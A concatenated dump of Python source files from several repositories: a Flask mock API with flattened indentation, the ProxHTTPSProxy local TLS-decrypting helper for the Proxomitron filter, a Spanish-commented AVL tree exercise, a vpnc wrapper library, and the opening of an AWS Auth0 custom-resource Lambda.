# Data in memory
names = {
"tim": {"age":19, "gender":"male"},
"bill": {"age":70, "gender":"male"}
}
# UserData
# 0x0080 is the userAddr
mockuserdata = {
# "status": "success",
"0x0080":
{
"userAddress": "0x0080",
"account_total":700,
"latest_month":9
},
# "message": "Successfully! All records has been fetched."
}
users = {}
# return JSON serializable objects
class JubilantMarket(Resource):
def get(self, name, test):
return {"name": name, "test":test}
def post(self):
return {"data": "Posted"}
class GetData(Resource):
def get(self, name):
return names[name]
class MockUserData(Resource):
def get(self, userAddress):
abort_if_useraddr_doesnt_exist(userAddress)
return users[userAddress]
def put(self, userAddress):
abort_if_userAddr_exists(userAddress)
args = user_put_args.parse_args()
users[userAddress] = args
return users[userAddress], 201
def delete(self, userAddress):
abort_if_useraddr_doesnt_exist(userAddress)
del users[userAddress]
return '', 204
class EMF(Resource):
    # flask_restful passes every URL parameter to each method, so both
    # userAddress and action must appear in the signatures below.
    def get(self, userAddress, action):
        # check if existing account
        return mockuserdata[userAddress]
    def deposit(self, userAddress, action):
        return {"userAddress": userAddress, "action": action}
    def put(self, userAddress, action):
        return {"data": "Deposit Made!"}
api.add_resource(JubilantMarket, "/jubilantmarket/<string:name>/<int:test>")
api.add_resource(GetData, "/jubilantmarket/<string:name>")
api.add_resource(MockUserData, "/jubilantmarket/mockuserdata/<string:userAddress>")
api.add_resource(EMF, "/jubilantmarket/EMF/<string:userAddress>/<string:action>")
# Emergency Medical Fund Call
# Start Smart Contract
# User Depoists function call (Solidity)
# Parameters
# pass username, user's address, amount of money depoisted from "wallet or bank acct"
# Users's Address Wallet to EMF Wallet Block
# DepoistToEMF(solidity function)
# return statements
#
# OpenVessel deposit function call from user to Stake Pool
# Parameters
#
# EMF Wallet Block hits limit to deposit into Stake Pool Addresss
# # Calling Solidity Code
# contract_id, contract_interface = compile()
# API_USERNAME = config('HOME')
# INFURA = config('PROID')
# API_KEY = config('WEB3_INFURA_API_SECRET')
# CORE_ACCOUNT = config('BUSINESSACCOUNT')
# bytecode = contract_interface['bin']
# abi = contract_interface['abi']
# # flask endpoint will be used as "API" we send Web request to trigger contract lock and transactions
# @app.route('/') #flask instance app fun() route
# def index(): #view functions
# # pip install web3[tester]
# # ERROR: Failed building wheel for pyethash
# return 'passObj'
# # http://127.0.0.1:5000/
# # 172.16.58.3:8000
# # /api/uploadCall routes web request
# # endpoint
# @app.route('/uploadCall', methods=['POST', 'GET']) #flask instance app fun() route
# def UploadCall():
# trigger = False
# # backend validation
# print(request.remote_addr)
# print(request.method)
# NewObj = request.json
# if request.method == 'POST':
# # jsonObj = NewObj['imageData']
# # print(jsonObj)
# print("upload to database")
# trigger = True
# if trigger == True:
# responsPayLoad = {
# "message":"Upload successful",
# }
# return jsonify(responsPayLoad), 200
# if trigger == False:
# responsPayLoad = {
# "message":"Upload Failed",
# }
# return jsonify(responsPayLoad), 200
if __name__ == "__main__":
app.run(debug=True)
``` |
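A hedged sketch of exercising the MockUserData resource with the requests library (host/port assume the Flask dev server defaults):
```python
# Hedged sketch: assumes the Flask dev server defaults (127.0.0.1:5000).
import requests

base = "http://127.0.0.1:5000/jubilantmarket/mockuserdata/0x0080"
requests.put(base, json={
    "userAddress": "0x0080", "account_total": 700, "latest_month": 9,
})                                  # 201 Created
print(requests.get(base).json())    # -> the stored record
requests.delete(base)               # 204 No Content
```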
{
"source": "3Lu/privoxy-https-wrapper",
"score": 2
} |
#### File: wrapper/ProxHTTPSProxy/ProxHTTPSProxy.py
```python
"A Proxomitron Helper Program"
_name = 'ProxHTTPSProxyMII'
__author__ = 'phoenix'
__version__ = 'v1.5'
CONFIG = "/etc/ProxHTTPSProxy/config/config.ini"
CA_CERTS = "/etc/ProxHTTPSProxy/cert/cacert.pem"
import os
import time
import configparser
import fnmatch
import logging
import threading
import ssl
import urllib3
from urllib3.contrib.socks import SOCKSProxyManager
#https://urllib3.readthedocs.org/en/latest/security.html#insecurerequestwarning
#urllib3.disable_warnings()
from socketserver import ThreadingMixIn
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse
from ProxyTool import ProxyRequestHandler, get_cert, counter
from colorama import init, Fore, Back, Style
init(autoreset=True)
class LoadConfig:
def __init__(self, configfile):
self.config = configparser.ConfigParser(allow_no_value=True,
inline_comment_prefixes=('#',))
self.config.read(configfile)
self.PROXADDR = self.config['GENERAL'].get('ProxAddr')
self.FRONTPORT = int(self.config['GENERAL'].get('FrontPort'))
self.REARPORT = int(self.config['GENERAL'].get('RearPort'))
self.DEFAULTPROXY = self.config['GENERAL'].get('DefaultProxy')
self.LOGLEVEL = self.config['GENERAL'].get('LogLevel')
class ConnectionPools:
"""
self.pools is a list of {'proxy': 'http://127.0.0.1:8080',
'pool': urllib3.ProxyManager() object,
'patterns': ['ab.com', 'bc.net', ...]}
self.getpool() is a method that returns pool based on host matching
"""
# Windows default CA certificates are incomplete
# See: http://bugs.python.org/issue20916
# cacert.pem sources:
# - http://curl.haxx.se/docs/caextract.html
# - http://certifi.io/en/latest/
# ssl_version="TLSv1" to specific version
sslparams = dict(cert_reqs="REQUIRED", ca_certs=CA_CERTS)
# IE: http://support2.microsoft.com/kb/181050/en-us
# Firefox about:config
# network.http.connection-timeout 90
# network.http.response.timeout 300
timeout = urllib3.util.timeout.Timeout(connect=90.0, read=300.0)
def __init__(self, config):
self.file = config
self.file_timestamp = os.path.getmtime(config)
self.loadConfig()
def loadConfig(self):
# self.conf has to be inited each time for reloading
self.conf = configparser.ConfigParser(allow_no_value=True, delimiters=('=',),
inline_comment_prefixes=('#',))
self.conf.read(self.file)
self.pools = []
proxy_sections = [section for section in self.conf.sections()
if section.startswith('PROXY')]
for section in proxy_sections:
proxy = section.split()[1]
self.pools.append(dict(proxy=proxy,
pool=self.setProxyPool(proxy),
patterns=list(self.conf[section].keys())))
default_proxy = self.conf['GENERAL'].get('DefaultProxy')
default_pool = (self.setProxyPool(default_proxy) if default_proxy else
[urllib3.PoolManager(num_pools=10, maxsize=8, timeout=self.timeout, **self.sslparams),
urllib3.PoolManager(num_pools=10, maxsize=8, timeout=self.timeout)])
self.pools.append({'proxy': default_proxy, 'pool': default_pool, 'patterns': '*'})
self.noverifylist = list(self.conf['SSL No-Verify'].keys())
self.blacklist = list(self.conf['BLACKLIST'].keys())
self.sslpasslist = list(self.conf['SSL Pass-Thru'].keys())
self.bypasslist = list(self.conf['BYPASS URL'].keys())
def reloadConfig(self):
while True:
mtime = os.path.getmtime(self.file)
if mtime > self.file_timestamp:
self.file_timestamp = mtime
self.loadConfig()
logger.info(Fore.RED + Style.BRIGHT
+ "*" * 20 + " CONFIG RELOADED " + "*" * 20)
time.sleep(1)
def getpool(self, host, httpmode=False):
noverify = True if httpmode or any((fnmatch.fnmatch(host, pattern) for pattern in self.noverifylist)) else False
for pool in self.pools:
if any((fnmatch.fnmatch(host, pattern) for pattern in pool['patterns'])):
return pool['proxy'], pool['pool'][noverify], noverify
def setProxyPool(self, proxy):
scheme = proxy.split(':')[0]
if scheme in ('http', 'https'):
ProxyManager = urllib3.ProxyManager
elif scheme in ('socks4', 'socks5'):
ProxyManager = SOCKSProxyManager
else:
print("Wrong Proxy Format: " + proxy)
print("Proxy should start with http/https/socks4/socks5 .")
input()
raise SystemExit
# maxsize is the max. number of connections to the same server
return [ProxyManager(proxy, num_pools=10, maxsize=8, timeout=self.timeout, **self.sslparams),
ProxyManager(proxy, num_pools=10, maxsize=8, timeout=self.timeout)]
class FrontServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
class RearServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
class FrontRequestHandler(ProxyRequestHandler):
"""
Sit between the client and Proxomitron
Convert https request to http
"""
server_version = "%s FrontProxy/%s" % (_name, __version__)
def do_CONNECT(self):
"Decrypt https request and dispatch to http handler"
# request line: CONNECT www.example.com:443 HTTP/1.1
self.host, self.port = self.path.split(":")
self.proxy, self.pool, self.noverify = pools.getpool(self.host)
if any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.blacklist)):
# BLACK LIST
self.deny_request()
logger.info("%03d " % self.reqNum + Fore.CYAN + 'Denied by blacklist: %s' % self.host)
elif any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.sslpasslist)):
# SSL Pass-Thru
if self.proxy and self.proxy.startswith('https'):
self.forward_to_https_proxy()
elif self.proxy and self.proxy.startswith('socks5'):
self.forward_to_socks5_proxy()
else:
self.tunnel_traffic()
            # Upstream server or proxy of the tunnel is closed explicitly, so we close the local connection too
self.close_connection = 1
else:
# SSL MITM
self.wfile.write(("HTTP/1.1 200 Connection established\r\n" +
"Proxy-agent: %s\r\n" % self.version_string() +
"\r\n").encode('ascii'))
# commonname = '.' + self.host.partition('.')[-1] if self.host.count('.') >= 2 else self.host
commonname = self.host
dummycert = get_cert(commonname)
# set a flag for do_METHOD
self.ssltunnel = True
ssl_sock = ssl.wrap_socket(self.connection, keyfile=dummycert, certfile=dummycert, server_side=True)
# Ref: Lib/socketserver.py#StreamRequestHandler.setup()
self.connection = ssl_sock
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
# dispatch to do_METHOD()
self.handle_one_request()
def do_METHOD(self):
"Forward request to Proxomitron"
counter.increment_and_set(self, 'reqNum')
if self.ssltunnel:
# https request
host = self.host if self.port == '443' else "%s:%s" % (self.host, self.port)
url = "https://%s%s" % (host, self.path)
self.bypass = any((fnmatch.fnmatch(url, pattern) for pattern in pools.bypasslist))
if not self.bypass:
url = "http://%s%s" % (host, self.path)
# Tag the request so Proxomitron can recognize it
self.headers["Tagged"] = self.version_string() + ":%d" % self.reqNum
else:
# http request
self.host = urlparse(self.path).hostname
if any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.blacklist)):
# BLACK LIST
self.deny_request()
logger.info("%03d " % self.reqNum + Fore.CYAN + 'Denied by blacklist: %s' % self.host)
return
host = urlparse(self.path).netloc
self.proxy, self.pool, self.noverify = pools.getpool(self.host, httpmode=True)
self.bypass = any((fnmatch.fnmatch('http://' + host + urlparse(self.path).path, pattern) for pattern in pools.bypasslist))
url = self.path
self.url = url
pool = self.pool if self.bypass else proxpool
data_length = self.headers.get("Content-Length")
self.postdata = self.rfile.read(int(data_length)) if data_length and int(data_length) > 0 else None
if self.command == "POST" and "Content-Length" not in self.headers:
buffer = self.rfile.read()
if buffer:
logger.warning("%03d " % self.reqNum + Fore.RED +
'POST w/o "Content-Length" header (Bytes: %d | Transfer-Encoding: %s | HTTPS: %s',
len(buffer), "Transfer-Encoding" in self.headers, self.ssltunnel)
# Remove hop-by-hop headers
self.purge_headers(self.headers)
r = None
        # Below code in connectionpool.py expects the headers to have a copy() and update() method
# That's why we can't use self.headers directly when call pool.urlopen()
#
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
# if self.scheme == 'http':
# headers = headers.copy()
# headers.update(self.proxy_headers)
headers = urllib3._collections.HTTPHeaderDict(self.headers)
try:
# Sometimes 302 redirect would fail with "BadStatusLine" exception, and IE11 doesn't restart the request.
# retries=1 instead of retries=False fixes it.
#! Retry may cause the requests with the same reqNum appear in the log window
r = pool.urlopen(self.command, url, body=self.postdata, headers=headers,
retries=1, redirect=False, preload_content=False, decode_content=False)
if not self.ssltunnel:
if self.bypass:
prefix = '[BP]' if self.proxy else '[BD]'
else:
prefix = '[D]'
if self.command in ("GET", "HEAD"):
logger.info("%03d " % self.reqNum + Fore.MAGENTA + '%s "%s %s" %s %s' %
(prefix, self.command, url, r.status, r.getheader('Content-Length', '-')))
else:
logger.info("%03d " % self.reqNum + Fore.MAGENTA + '%s "%s %s %s" %s %s' %
(prefix, self.command, url, data_length, r.status, r.getheader('Content-Length', '-')))
self.send_response_only(r.status, r.reason)
# HTTPResponse.msg is easier to handle than urllib3._collections.HTTPHeaderDict
r.headers = r._original_response.msg
self.purge_write_headers(r.headers)
if self.command == 'HEAD' or r.status in (100, 101, 204, 304) or r.getheader("Content-Length") == '0':
written = None
else:
written = self.stream_to_client(r)
if "Content-Length" not in r.headers and 'Transfer-Encoding' not in r.headers:
self.close_connection = 1
# Intend to catch regular http and bypass http/https requests exceptions
# Regular https request exceptions should be handled by rear server
except urllib3.exceptions.TimeoutError as e:
self.sendout_error(url, 504, message="Timeout", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[F] %s on "%s %s"', e, self.command, url)
except (urllib3.exceptions.HTTPError,) as e:
self.sendout_error(url, 502, message="HTTPError", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[F] %s on "%s %s"', e, self.command, url)
finally:
if r:
# Release the connection back into the pool
r.release_conn()
do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = do_METHOD
class RearRequestHandler(ProxyRequestHandler):
"""
Supposed to be the parent proxy for Proxomitron for tagged requests
Convert http request to https
"""
server_version = "%s RearProxy/%s" % (_name, __version__)
def do_METHOD(self):
"Convert http request to https"
if self.headers.get("Tagged") and self.headers["Tagged"].startswith(_name):
self.reqNum = int(self.headers["Tagged"].split(":")[1])
# Remove the tag
del self.headers["Tagged"]
else:
self.sendout_error(self.path, 400,
explain="The proxy setting of the client is misconfigured.\n\n" +
"Please set the HTTPS proxy port to %s " % config.FRONTPORT +
"and check the Docs for other settings.")
logger.error(Fore.RED + Style.BRIGHT + "[Misconfigured HTTPS proxy port] " + self.path)
return
# request line: GET http://somehost.com/path?attr=value HTTP/1.1
url = "https" + self.path[4:]
self.host = urlparse(self.path).hostname
proxy, pool, noverify = pools.getpool(self.host)
prefix = '[P]' if proxy else '[D]'
data_length = self.headers.get("Content-Length")
self.postdata = self.rfile.read(int(data_length)) if data_length else None
self.purge_headers(self.headers)
r = None
        # Below code in connectionpool.py expects the headers to have a copy() and update() method
# That's why we can't use self.headers directly when call pool.urlopen()
#
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
# if self.scheme == 'http':
# headers = headers.copy()
# headers.update(self.proxy_headers)
headers = urllib3._collections.HTTPHeaderDict(self.headers)
try:
r = pool.urlopen(self.command, url, body=self.postdata, headers=headers,
retries=1, redirect=False, preload_content=False, decode_content=False)
if proxy:
logger.debug('Using Proxy - %s' % proxy)
color = Fore.RED if noverify else Fore.GREEN
if self.command in ("GET", "HEAD"):
logger.info("%03d " % self.reqNum + color + '%s "%s %s" %s %s' %
(prefix, self.command, url, r.status, r.getheader('Content-Length', '-')))
else:
logger.info("%03d " % self.reqNum + color + '%s "%s %s %s" %s %s' %
(prefix, self.command, url, data_length, r.status, r.getheader('Content-Length', '-')))
self.send_response_only(r.status, r.reason)
# HTTPResponse.msg is easier to handle than urllib3._collections.HTTPHeaderDict
r.headers = r._original_response.msg
self.purge_write_headers(r.headers)
if self.command == 'HEAD' or r.status in (100, 101, 204, 304) or r.getheader("Content-Length") == '0':
written = None
else:
written = self.stream_to_client(r)
if "Content-Length" not in r.headers and 'Transfer-Encoding' not in r.headers:
self.close_connection = 1
except urllib3.exceptions.SSLError as e:
self.sendout_error(url, 417, message="SSL Certificate Failed", explain=e)
logger.error("%03d " % self.reqNum + Fore.RED + Style.BRIGHT + "[SSL Certificate Error] " + url)
except urllib3.exceptions.TimeoutError as e:
self.sendout_error(url, 504, message="Timeout", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[R]%s "%s %s" %s', prefix, self.command, url, e)
except (urllib3.exceptions.HTTPError,) as e:
self.sendout_error(url, 502, message="HTTPError", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[R]%s "%s %s" %s', prefix, self.command, url, e)
finally:
if r:
# Release the connection back into the pool
r.release_conn()
do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = do_METHOD
"""
#Information#
* Python default ciphers: http://bugs.python.org/issue20995
* SSL Cipher Suite Details of Your Browser: https://cc.dcsec.uni-hannover.de/
* https://wiki.mozilla.org/Security/Server_Side_TLS
"""
try:
if os.name == 'nt':
import ctypes
ctypes.windll.kernel32.SetConsoleTitleW('%s %s' % (_name, __version__))
config = LoadConfig(CONFIG)
logger = logging.getLogger(__name__)
logger.setLevel(getattr(logging, config.LOGLEVEL, logging.INFO))
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(message)s', datefmt='[%H:%M]')
handler.setFormatter(formatter)
logger.addHandler(handler)
pools = ConnectionPools(CONFIG)
proxpool = urllib3.ProxyManager(config.PROXADDR, num_pools=10, maxsize=8,
# A little longer than timeout of rear pool
# to avoid trigger front server exception handler
timeout=urllib3.util.timeout.Timeout(connect=90.0, read=310.0))
frontserver = FrontServer(('', config.FRONTPORT), FrontRequestHandler)
rearserver = RearServer(('', config.REARPORT), RearRequestHandler)
for worker in (frontserver.serve_forever, rearserver.serve_forever,
pools.reloadConfig):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
print("=" * 76)
print('%s %s (urllib3/%s)' % (_name, __version__, urllib3.__version__))
print()
print(' FrontServer : localhost:%s' % config.FRONTPORT)
print(' RearServer : localhost:%s' % config.REARPORT)
print(' ParentServer : %s' % config.DEFAULTPROXY)
print(' Proxomitron : ' + config.PROXADDR)
print("=" * 76)
while True:
time.sleep(1)
except KeyboardInterrupt:
print("Quitting...")
``` |
{
"source": "3lyalvarado/Metodos-basicos",
"score": 2
} |
#### File: Metodos-basicos/Prototipo avl/BaseD.py
```python
from Tabla import Tabla  # assumes the Tabla module exposes a Tabla class
class bd:
def __init__(self):
self.idTabla = None
self.arvolTabla = Tabla()
def crear(self, valor):
self.arvolTabla.add(valor)
def borrar(self, valor):
self.arvolTabla.Eliminar(valor)
```
#### File: Metodos-basicos/Prototipo avl/eddP1.py
```python
class Node:
def __init__(self, valor):
self.valor = valor
self.hijo_izquierdo = None
self.hijo_derecho = None
self.altura = 0
class AVLTree:
def __init__(self):
self.raiz = None
def add(self, valor):
self.raiz = self._add(valor, self.raiz)
def _add(self, valor, aux):
if aux is None:
return Node(valor)
elif valor > aux.valor:
aux.hijo_derecho = self._add(valor, aux.hijo_derecho)
if (self.alturaNodo(aux.hijo_derecho)-self.alturaNodo(aux.hijo_izquierdo)) == 2:
if valor > aux.hijo_derecho.valor:
aux = self.RotacionIzquierda(aux)
else:
aux = self.RotacionDobleIzquierda(aux)
else:
aux.hijo_izquierdo = self._add(valor, aux.hijo_izquierdo)
if (self.alturaNodo(aux.hijo_izquierdo)-self.alturaNodo(aux.hijo_derecho)) == 2:
if valor < aux.hijo_izquierdo.valor:
aux = self.RotacionDerecha(aux)
else:
aux = self.RotacionDobleDerecha(aux)
r = self.alturaNodo(aux.hijo_derecho)
l = self.alturaNodo(aux.hijo_izquierdo)
m = self.maxi(r, l)
aux.altura = m+1
return aux
def alturaNodo(self, aux):
if aux is None:
return -1
else:
return aux.altura
    def maxi(self, r, l):
        return max(r, l)
def RotacionDerecha(self, t1):
t2 = t1.hijo_izquierdo
t1.hijo_izquierdo = t2.hijo_derecho
t2.hijo_derecho = t1
t1.altura = self.maxi(self.alturaNodo(
t1.hijo_izquierdo), self.alturaNodo(t1.hijo_derecho))+1
t2.altura = self.maxi(self.alturaNodo(t2.hijo_izquierdo), t1.altura)+1
return t2
def RotacionIzquierda(self, t1):
t2 = t1.hijo_derecho
t1.hijo_derecho = t2.hijo_izquierdo
t2.hijo_izquierdo = t1
t1.altura = self.maxi(self.alturaNodo(
t1.hijo_izquierdo), self.alturaNodo(t1.hijo_derecho))+1
t2.altura = self.maxi(self.alturaNodo(t2.hijo_izquierdo), t1.altura)+1
return t2
def RotacionDobleDerecha(self, aux):
aux.hijo_izquierdo = self.RotacionIzquierda(aux.hijo_izquierdo)
return self.RotacionDerecha(aux)
def RotacionDobleIzquierda(self, aux):
aux.hijo_derecho = self.RotacionDerecha(aux.hijo_derecho)
return self.RotacionIzquierda(aux)
def _Eliminar(self, valor):
self.raiz = self.Eliminar(valor, self.raiz)
def Eliminar(self, valor, nodo):
if nodo is None:
print("Elemento no encontrado")
return None
elif (nodo.valor > valor):
nodo.hijo_izquierdo = self.Eliminar(valor, nodo.hijo_izquierdo)
elif (nodo.valor < valor):
nodo.hijo_derecho = self.Eliminar(valor, nodo.hijo_derecho)
elif (nodo.hijo_izquierdo != None and nodo.hijo_derecho != None):
aux = self.EncontrarMenor(nodo.hijo_derecho)
nodo.valor = aux.valor
nodo.hijo_derecho = self.Eliminar(nodo.valor, nodo.hijo_derecho)
else:
aux = nodo
if (nodo.hijo_izquierdo is None):
nodo = nodo.hijo_derecho
elif (nodo.hijo_derecho is None):
nodo = nodo.hijo_izquierdo
del aux
if (nodo is None):
return nodo
nodo.altura = self.maxi(self.alturaNodo(
nodo.hijo_izquierdo), self.alturaNodo(nodo.hijo_derecho)) + 1
balance = self.GetBalance(nodo)
if (balance < -1):
if (self.GetBalance(nodo.hijo_derecho) <= 0):
return self.RotacionIzquierda(nodo)
else:
return self.RotacionDobleIzquierda(nodo)
elif (balance > 1):
if (self.GetBalance(nodo.hijo_izquierdo) >= 0):
return self.RotacionDerecha(nodo)
else:
return self.RotacionDobleDerecha(nodo)
return nodo
def GetBalance(self, nodo):
if (nodo is None):
return 0
return (self.alturaNodo(nodo.hijo_izquierdo) - self.alturaNodo(nodo.hijo_derecho))
def EncontrarMenor(self, nodo):
if nodo is None:
return None
elif (nodo.hijo_izquierdo is None):
return nodo
else:
return self.EncontrarMenor(nodo.hijo_izquierdo)
def preorder(self):
self._preorder(self.raiz)
def _preorder(self, aux):
if aux:
print(aux.valor, end=' ')
self._preorder(aux.hijo_izquierdo)
self._preorder(aux.hijo_derecho)
def inorder(self):
self._inorder(self.raiz)
def _inorder(self, aux):
if aux:
self._inorder(aux.hijo_izquierdo)
print(aux.valor, end=' ')
self._inorder(aux.hijo_derecho)
def postorder(self):
self._postorder(self.raiz)
def _postorder(self, aux):
if aux:
self._postorder(aux.hijo_izquierdo)
self._postorder(aux.hijo_derecho)
print(aux.valor, end=' ')
def getValor(self, nodo):
return nodo.valor
CADENA=""
Count=0
def GetDotArbol(self, inicio):
self.Count+=1
# nodo = str(inicio.valor) + " [label=\"" + str(inicio.valor) + "]\n"
nodo = ""
if (inicio.hijo_izquierdo != None):
nodo += str(inicio.valor) + " -> " + \
str(self.getValor(inicio.hijo_izquierdo))+"\n"
self.GetDotArbol(inicio.hijo_izquierdo)
if (inicio.hijo_derecho != None):
nodo += str(inicio.valor) + " -> " + \
str(self.getValor(inicio.hijo_derecho)) + "\n"
self.GetDotArbol(inicio.hijo_derecho)
self.CADENA+=nodo
return nodo
def PRINT(self,raiz):
self.GetDotArbol(raiz)
x="\nDigraph Arbol{\nrankdir = TB;\nnode[shape = circle];\n"+self.CADENA+"}"
print(x)
t = AVLTree()
t.add(56)
t.add(61)
t.add(68)
t.add(89)
t.add(100)
t.add(1)
t.add(12)
t.add(19)
t.add(10)
t.add(15)
t.add(58)
t.add(9)
#t._Eliminar(15)
# t._Eliminar(10)
# t._Eliminar(9)
t.preorder()
print()
t.inorder()
print()
t.postorder()
# t.preorder()
# print()
# t.inorder()
# print()
# t.postorder()
t.PRINT(t.raiz)
``` |
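A quick sanity check for the tree above — a minimal sketch that is not part of the original repo. It assumes `eddP1.py` is importable (note that importing it also runs the module-level demo at the bottom of the file) and verifies the left rotation triggered by three ascending inserts:

```python
# Hypothetical usage sketch for the AVLTree above (not in the original repo).
# Importing eddP1 also executes its module-level demo code.
from eddP1 import AVLTree

t = AVLTree()
for v in (10, 20, 30):  # inserting ascending values forces a left rotation
    t.add(v)
assert t.raiz.valor == 20   # 20 becomes the new root after rebalancing
assert t.raiz.altura == 1   # heights are recomputed on the way back up
t._Eliminar(30)
assert t.raiz.valor == 20 and t.raiz.hijo_derecho is None
```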
{
"source": "3mb3dw0rk5/pyvpnc",
"score": 3
} |
#### File: pyvpnc/vpnc/__init__.py
```python
from __future__ import print_function
import signal
import sys
import os
import subprocess
from contextlib import contextmanager
HERE = os.path.dirname(os.path.realpath(__file__))
class ProcessException(Exception):
def __init__(self, returncode, cmd, stdout, stderr):
self.returncode = returncode
self.cmd = cmd
self.stdout = stdout
self.stderr = stderr
def __str__(self):
if self.returncode and self.returncode < 0:
try:
return "Command '%s' died with %r." % (
self.cmd, signal.Signals(-self.returncode))
except ValueError:
return "Command '%s' died with unknown signal %d." % (
self.cmd, -self.returncode)
else:
return "Command '%s' returned non-zero exit status %d." % (
self.cmd, self.returncode)
def process_call(cmd):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode:
        raise ProcessException(process.returncode, cmd, stdout, stderr)
return process.returncode, stdout, stderr
class VPNC(object):
def __init__(self, config=None,
config_file="tempvpnc.conf",
config_folder=None):
self.config = config or dict()
self.config_file = config_file
self.temp_config_path = os.path.join(HERE, self.config_file)
self.config_folder = config_folder
if config_folder is None:
if sys.platform.startswith("linux"):
self.config_folder = "/etc/vpnc"
elif sys.platform.startswith("darwin"):
self.config_folder = "/usr/local/etc/vpnc"
self.config_path = os.path.join(self.config_folder, self.config_file)
def create_config_file(self):
"""Creates a formatted VPNC config file."""
with open(self.temp_config_path, "w+") as f:
print("IPSec gateway %(IPSec_gateway)s\n"
"IPSec ID %(IPSec_ID)s\n"
"IPSec secret %(IPSec_secret)s\n"
"IKE Authmode %(IKE_Authmode)s\n"
"Xauth username %(Xauth_username)s\n"
"Xauth password %(Xauth_password)s" % self.config,
file=f)
def move_config_file(self):
"""Moves the VPNC config file to /etc/vpnc (Linux) or
/usr/local/etc/vpnc/ (OSX).
"""
process_call(["mv", self.temp_config_path, self.config_folder])
process_call(["chown", "root:root", self.config_path])
process_call(["chmod", "600", self.config_path])
def remove_config_file(self):
"""Removes the auto-generated VPNC config file."""
        try:
            process_call(["rm", self.config_path])
            return True
        except ProcessException:
            return False
def connect(self):
"""Connects to VPNC."""
self.create_config_file()
self.move_config_file()
process_call(["vpnc", "tempvpnc"])
def disconnect(self):
"""Disconnects from VPNC."""
process_call(["vpnc-disconnect"])
self.remove_config_file()
    @contextmanager
    def vpn(self):
        """Creates VPN context; always disconnects, even if the body raises."""
        self.connect()
        try:
            yield
        finally:
            self.disconnect()
``` |
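A hypothetical usage sketch (not part of the package). The config keys mirror the template written by `create_config_file()`; the gateway and credentials are placeholders, and running it requires root plus `vpnc` in `$PATH`:

```python
# Hypothetical usage sketch; config keys match create_config_file()'s template.
from vpnc import VPNC

client = VPNC(config={
    "IPSec_gateway": "vpn.example.com",   # placeholder gateway
    "IPSec_ID": "example-group",
    "IPSec_secret": "group-secret",
    "IKE_Authmode": "psk",
    "Xauth_username": "user",
    "Xauth_password": "pass",
})

with client.vpn():
    pass  # traffic inside this block is routed through the tunnel
```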
{
"source": "3mcloud/aws-auth0-custom-resource",
"score": 2
} |
#### File: aws-auth0-custom-resource/src/api.py
```python
import logging
import boto3
from crhelper import CfnResource
from auth0.v3.exceptions import Auth0Error
from .utils import config
from .lambdatype import LambdaDict, LambdaContext
from .validation.api import auth0Validator
logger = logging.getLogger('aws-auth0-cr')
secrets_client = boto3.client('secretsmanager')
def create(event: LambdaDict, _: LambdaContext, helper: CfnResource) -> str:
"""
Create an api with the given identifier
"""
props = event['ResourceProperties']
validated = auth0Validator.validated(props)
if not validated:
raise Exception(auth0Validator.errors)
provider = config.get_provider(props.get('Tenant'))
api_id = provider.create_api(**validated)
helper.Data['ApiId'] = api_id
helper.Data['Audience'] = props.get('Audience')
return api_id
def update(event: LambdaDict, _: LambdaContext, helper: CfnResource) -> str:
"""
Update an API
"""
props = event['ResourceProperties']
validated = auth0Validator.validated(props)
if not validated:
raise Exception(auth0Validator.errors)
provider = config.get_provider(props.get('Tenant'))
api_id = event['PhysicalResourceId']
    # Handle an audience change by replacing the resource: create a new API,
    # delete the old one, and report the new physical ID to CloudFormation.
    if props['Audience'] != event['OldResourceProperties']['Audience']:
        logger.info('New audience, deleting old resource and creating a new one.')
        api_id = provider.create_api(**validated)
        delete_handle_err(provider, event['PhysicalResourceId'])
    else:
        del validated['identifier']
        provider.update_api(event['PhysicalResourceId'], **validated)
    helper.Data['ApiId'] = api_id
    helper.Data['Audience'] = props.get('Audience')
    return api_id
def delete(event: LambdaDict, context: LambdaContext, helper: CfnResource): # pylint: disable=unused-argument
"""Delete an api"""
props = event['ResourceProperties']
provider = config.get_provider(props['Tenant'])
delete_handle_err(provider, event['PhysicalResourceId'])
def delete_handle_err(provider, api_id):
"""Delete an API and handle the errors"""
try:
# deleting an api id that doesn't exist does not raise exception
# see e2e/test_errors.py
provider.delete_api(api_id)
except Auth0Error as err:
logger.error(err)
if 'Path validation error' in err.message:
            logger.error('physical resource id is not a valid id. '
                         'Assuming this failed to create.')
return
raise
```
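To make the handler contract concrete, here is a sketch of the event shapes these functions read, inferred from the code above. Real events come from CloudFormation via `crhelper`; `Tenant`, the resource-property names besides `Audience`, and all values are placeholders:

```python
# Hypothetical event shapes only, inferred from how create()/update() read them.
create_event = {
    "RequestType": "Create",
    "ResourceProperties": {
        "Tenant": "mmm-dev",                   # placeholder tenant
        "Audience": "https://api.example.com",
        "Name": "myapi",                       # assumed property name
    },
}
update_event = {
    "RequestType": "Update",
    "PhysicalResourceId": "res_abc123",        # id returned by a prior create
    "ResourceProperties": {**create_event["ResourceProperties"],
                           "Audience": "https://api-v2.example.com"},
    "OldResourceProperties": create_event["ResourceProperties"],
}
```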
#### File: src/auth0_provider/index.py
```python
import logging
import json
import time
import boto3
from auth0.v3.authentication import GetToken
from auth0.v3.management import Auth0
from src.utils import secret
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# Page limit for auth0 in case of run-away pagination
